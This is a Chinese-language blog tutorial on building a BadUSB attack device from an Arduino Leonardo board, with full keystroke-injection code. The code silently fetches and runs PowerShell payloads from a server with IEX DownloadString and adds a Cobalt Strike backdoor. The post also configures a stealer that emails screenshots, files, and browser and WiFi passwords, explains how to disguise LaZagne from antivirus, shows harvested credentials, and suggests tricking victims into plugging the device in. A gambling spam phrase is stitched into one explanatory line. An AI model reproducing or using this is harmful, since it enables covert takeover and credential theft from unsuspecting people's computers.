插一个U盘黑一台电脑-Badusb最详细制作教程

0x000-前言

有技术交流或渗透测试培训需求的朋友欢迎联系QQ547006660
2000人网络安全交流群,欢迎大佬们来玩
在这里插入图片描述

0x001-简介

1.概述
在2014年美国黑帽大会上,安全研究人员JakobLell和独立安全研究人员Karsten Nohl展示了他们称为“BadUSB”的攻击方法,这种攻击方法让USB安全和几乎所有和USB相关的设备(包括具有USB端口的电脑)都陷入相当危险的状态。
在这里插入图片描述
2.Badusb内部结构
从这张图便可以了解到–Badusb和普通的U盘并没有什么两样,因此迷惑性极高,很容易攻击成功
在这里插入图片描述
3.Badusb Hid攻击原理
HID是Human Interface Device的缩写,由其名称可以了解HID设备是直接与人交互的设备,。一般来讲针对HID的攻击主要集中在键盘鼠标上,因为只要控制了用户键盘,基本上就等于控制了用户的电脑。攻击者会把攻击隐藏在一个正常的鼠标键盘中,当用户将含有攻击向量的鼠标或键盘,插入电脑时,恶意代码会被加载并执行。简而言之,今天要介绍的Badusb利用的是虚拟键盘来实现恶意代码的执行。

4.Badusb攻击优势
攻击者将恶意代码存放于Badusb的固件中,PC上的杀毒软件无法访问到U盘存放固件的区域,因此也就意味着杀毒软件无法应对BadUSB的攻击。

5.Teensy
攻击者在定制攻击设备时,会向USB设备中置入一个攻击芯片,此攻击芯片是一个非常小而且功能完整的单片机开发系统,它的名字叫TEENSY。通过TEENSY你可以模拟出一个键盘和鼠标,当你插入这个定制的USB设备时,电脑会识别为一个键盘,利用设备中的微处理器与存储空间和编程进去的攻击代码,就可以向主机发送控制命令,从而完全控制主机,无论自动播放是否开启,都可以成功。
在这里插入图片描述

6.Arduino
Arduino是一款便捷灵活、方便上手的开源电子原型平台。其开发环境,主要包含两个主要的部分:硬件部分是可以用来做电路连接的Arduino电路板;另外一个则是Arduino IDE,你的计算机中的程序开发环境。你只要在IDE中编写程序代码,将程序上传到Arduino电路板后,程序便会告诉Arduino电路板要做些什么了。
在这里插入图片描述
7.攻击流程
Bad-Usb插入后,会模拟键盘对电脑进行操作,通过这些操作打开电脑的命令终端,并执行一条命令,这条命令将从指定网址下载恶意代码(通常为powershell脚本)并于后台静默运行。这些代码功能包括:窃取信息、反弹shell、发送邮件等,从而实现控制目标机或者窃取信息的目的。
在这里插入图片描述

0x002-准备工作

1.硬件
我在这边选择的是BS Micro pro micro leonardo Arduino 开发板,结构是一个USB主控加一块到两块的存储颗粒。从原理来看。USB主控就是一个带原生usb接口的单片机。
虽然它的体积小,但它拥有丰富接口,使其不仅有传统控制器的功能,还有在电脑上实现鼠标、键盘的功能,串口功能,并且无需驱动,能直接实现与电脑的通信。
它与其他大多数的MCU控制板一个很大的区别是编程不需要额外使用编程器,直接用USB就可以编程。这样不仅方便、稳定、可靠,还省下了一个编程器的钱。
在这里插入图片描述

淘宝链接(如果不会编写脚本,请购买和作者一样的开发版,不要贪便宜):
https://item.taobao.com/item.htm?spm=a1z09.2.0.0.3d1f2e8dNaX0hO&id=589099911512&_u=m2i3k6cqf473

实际到货设备如图
在这里插入图片描述

2.开发环境安装
Arduino IDE
在这里插入图片描述
kali下已集成,windows下载链接:
http://downloads.arduino.cc/arduino-1.6.4-windows.zip
下载为zip文件,无需安装,直接解压就能用。
注意:不要下载高于1.6.4的版本,否则设备驱动无法正常安装!(我被这个坑乐好一段时间)

3.驱动准备
为了可以正常使用ardunio对开发版进行编程,需安装Teensyduino驱动
下载链接http://www.pjrc.com/teensy/td_123/teensyduino.exe
在这里插入图片描述
一路Next下来,本处选择刚刚解压的ardunio1.64路径才可以正常安装
在这里插入图片描述
选择all进行安装
在这里插入图片描述

4.开启smtp服务
为确保我们的脚本能够完美地发送包含目标主机信息的邮件,我们需要开启smtp邮箱服务。本处我使用的是QQ邮箱,开启方法如下:
进入邮箱,点击设置-账户
在这里插入图片描述

向下拉即可看到
在这里插入图片描述
将头两个服务开启,此过程需要验证密保~
即可获得“授权码”(即后文提到的邮箱密码)此处的邮箱密码并不是指QQ密码
在这里插入图片描述
5.服务器端准备
①首先下载Badusb所需代码,代码已打包,见文末
②修改压缩包中的main.ps1的2754行,把打码的地方改为自己的服务器IP
在这里插入图片描述

③修改main.ps1的2903-2919行 为发送邮件配置
在这里插入图片描述

④修改GetPass.ps1中的前两行,域名,Getpass.rar实际上是lazagne,用rar下载尽量避免出发安全软件,这个不放心可以百度下载。command.rar实为bat 因为 lazagne注入lsass时会被安全软件拦截,所以用bat避免注入。修改GetPass.ps1中的邮箱配置,同main.ps1中的就行
在这里插入图片描述
⑤将修改后的全部文件用HFS(一个简单的提供http下载软件)上传到公网服务器
HFS链接:http://www.ouyaoxiazai.com/soft/stgj/133/21762.html
兄弟们如果没有服务器,可以去买便宜的学生机,或者私聊我。
在这里插入图片描述

0x003-Badusb制作

1.将硬件插入电脑
在这里插入图片描述

2.打开Arduino IDE
3.工具->版->选择“Arduino Leonardo”
在这里插入图片描述

4.输入Windows +R 输入命令devmgmt.msc打开设备管理器
查看串口信息
在这里插入图片描述
5.根据之前的串口信息,打开ardunio ide选择–工具->端口->选择“COM* (Arduino Leonardo)”
6.现在可以看到IDE右下角出现“Arduino Leonardo on COM*”
在这里插入图片描述
6.下面进行将代码写入硬件的操作
①复制如下代码到ardunio中

void setup(){//初始化 
Keyboard.begin();//开始键盘通讯 
delay(5000);//延时 
Keyboard.press(KEY_LEFT_GUI);//win键 
delay(500);
Keyboard.press('r');//r键
delay(500); 
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r'); 
Keyboard.press(KEY_CAPS_LOCK);//利用开大写输小写绕过输入法
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("CMD");
delay(500);
Keyboard.press(KEY_RETURN); 
Keyboard.release(KEY_RETURN); 
delay(3000);
Keyboard.println("powershell -windowstyle hidden IEX (New-Object Net.WebClient).DownloadString('http://8.8.8.8/main.ps1') ");
Keyboard.press(KEY_RETURN); 
Keyboard.release(KEY_RETURN);
Keyboard.press(KEY_CAPS_LOCK); 
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();//结束键盘通讯 
Keyboard.begin();//开始键盘通讯 
delay(5000);//延时 
Keyboard.press(KEY_LEFT_GUI);//win键 
delay(500);
Keyboard.press('r');//r键
delay(500); 
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r'); 
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("CMD");
delay(500);
Keyboard.press(KEY_RETURN); 
Keyboard.release(KEY_RETURN); 
delay(3000);
Keyboard.println("powershell -windowstyle hidden IEX (New-Object Net.WebClient).DownloadString('http://8.8.8.8/payload.ps1') ");
Keyboard.press(KEY_RETURN); 
Keyboard.release(KEY_RETURN);
Keyboard.press(KEY_CAPS_LOCK); 
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();//结束键盘通讯 
}
void loop() {}

请各位将8.8.8.8改成自己的服务器ip~
注释写的应该都很明白了,小伙伴们可以根据自己的需求修改

PS:我这边选择执行两个payload,第一个是我之前教大家修改上传的main.ps1,这个脚本实现的是“截图、用户凭据导出,文件窃取,计算机中浏览器/WIFI等密码的读取”并将其通过邮箱发送到我们手中。
第二个Payload是我在cobaltstrike里面生成的powershell后门,主要为了实现控制持久化,并进行更高层级的渗透。如果小伙伴们不知道cobaltstrike是什么,简而言之-这是一款强大的团队协作APT神器,日后我会写一个系列教程专门介绍他。
在这里插入图片描述

代码大体的意思是:
插入BADusb后等待五秒,
切换大写绕开输入法
按下Windows+R打开cmd
模拟输入一个亚博yabo线上投注,并回车执行

当你将代码写入完成后,恭喜你,Badusb已制作成功
在这里插入图片描述

0x004测试

将Badusb插入电脑,短暂几秒延时后,发现打开了cmd窗口,输入了我们下载执行powershell的命令,并回车执行
在这里插入图片描述
过了几分钟,会来两封邮件
在这里插入图片描述
在这里插入图片描述
这里面便是我们心心念念的Badusb执行结果
Report.zip内容如图
在这里插入图片描述
Getpass txt内容如下

|==========================
|
| The LaZagne Project
|
|
|==========================

########## User: Administrator ##########

------------------- Chrome passwords -----------------

Password found !!!
URL: http://127.0.0.1/login
Login: admin
Password: xunfeng321

Password found !!!
URL: http://10.97.3.177:8080/cgi-bin/login.html
Login: admin
Password: admin
…内容太多,省略了

Cobaltstrike也收到了会话(我插了好几次)
在这里插入图片描述

0x005攻击场景

①社工攻击
小姐姐,我的U盘插我的电脑显示不出来,你能帮我看看你的电脑可以吗?
在这里插入图片描述
②带有USB接口的终端机
在这里插入图片描述
找到USB接口怼进去,插谁谁怀孕
其他应用场景自行脑补,欢迎评论分享

0x006总结

今天介绍了硬件设备Badusb的制作及使用,大家可以修改服务器端的powershell代码来实现更多的功能,欢迎评论分享自己的思路
本篇文章耗时7小时,也算是自己写过比较长的啦,希望老铁们多多关注。
在这里插入图片描述

0x007 Badusb代码下载[/md]

链接:https://pan.baidu.com/s/1ODHBZXUlyRxwk75Q6yuIXg
提取码:zisl